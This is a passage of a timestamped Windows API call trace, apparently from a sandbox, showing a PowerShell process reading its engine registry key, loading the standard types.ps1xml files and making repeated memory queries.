	[0275.764] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2ec, lpData=0x0, lpcbData=0x26d2e8*=0x0 | out: lpType=0x26d2ec*=0x1, lpData=0x0, lpcbData=0x26d2e8*=0x56) returned 0x0
	[0275.764] CoTaskMemAlloc (cb=0x5a) returned 0x5315d0
	[0275.764] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2bc, lpData=0x5315d0, lpcbData=0x26d2b8*=0x56 | out: lpType=0x26d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d2b8*=0x56) returned 0x0
	[0275.764] CoTaskMemFree (pv=0x5315d0) 
	[0275.764] RegCloseKey (hKey=0x32c) returned 0x0
	[0275.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0275.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0276.165] GetSystemInfo (in: lpSystemInfo=0x26bfa0 | out: lpSystemInfo=0x26bfa0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0276.165] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0276.175] SetErrorMode (uMode=0x1) returned 0x1
	[0276.175] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0276.175] GetFileType (hFile=0x32c) returned 0x1
	[0276.175] SetErrorMode (uMode=0x1) returned 0x1
	[0276.175] GetFileType (hFile=0x32c) returned 0x1
	[0276.175] ReadFile (in: hFile=0x32c, lpBuffer=0x2eefa18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2eefa18*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.716] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.717] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.717] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.717] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.717] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.718] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.719] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.719] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.720] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.720] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.720] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.720] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.721] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.721] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.721] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.721] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.723] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.723] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.723] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.724] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.724] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.724] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.724] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.725] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.725] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.725] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.725] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.726] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.726] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.726] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.726] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.727] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.729] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.729] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.729] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.730] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.730] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.730] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.730] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.731] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0276.731] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x1b4, lpOverlapped=0x0) returned 1
	[0276.731] ReadFile (in: hFile=0x32c, lpBuffer=0x2d55780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2d55780*, lpNumberOfBytesRead=0x26d308*=0x0, lpOverlapped=0x0) returned 1
	[0276.731] CloseHandle (hObject=0x32c) returned 1
	[0276.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0276.732] SetErrorMode (uMode=0x1) returned 0x1
	[0276.732] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d280 | out: lpFileInformation=0x26d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0276.732] SetErrorMode (uMode=0x1) returned 0x1
	[0276.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0276.732] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d368 | out: phkResult=0x26d368*=0x32c) returned 0x0
	[0276.732] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2ec, lpData=0x0, lpcbData=0x26d2e8*=0x0 | out: lpType=0x26d2ec*=0x1, lpData=0x0, lpcbData=0x26d2e8*=0x56) returned 0x0
	[0276.732] CoTaskMemAlloc (cb=0x5a) returned 0x51a970
	[0276.732] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2bc, lpData=0x51a970, lpcbData=0x26d2b8*=0x56 | out: lpType=0x26d2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d2b8*=0x56) returned 0x0
	[0276.733] CoTaskMemFree (pv=0x51a970) 
	[0276.733] RegCloseKey (hKey=0x32c) returned 0x0
	[0276.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0276.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0277.733] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.137] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.138] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.138] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.138] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.138] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.139] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.140] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.154] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.154] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.154] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.154] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.154] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.155] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.155] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.155] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.164] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.171] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.171] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.172] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.172] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.172] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.173] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.173] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.173] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.173] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.173] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.174] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.174] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.174] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.177] VirtualQuery (in: lpAddress=0x26c050, lpBuffer=0x26cf10, dwLength=0x30 | out: lpBuffer=0x26cf10*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
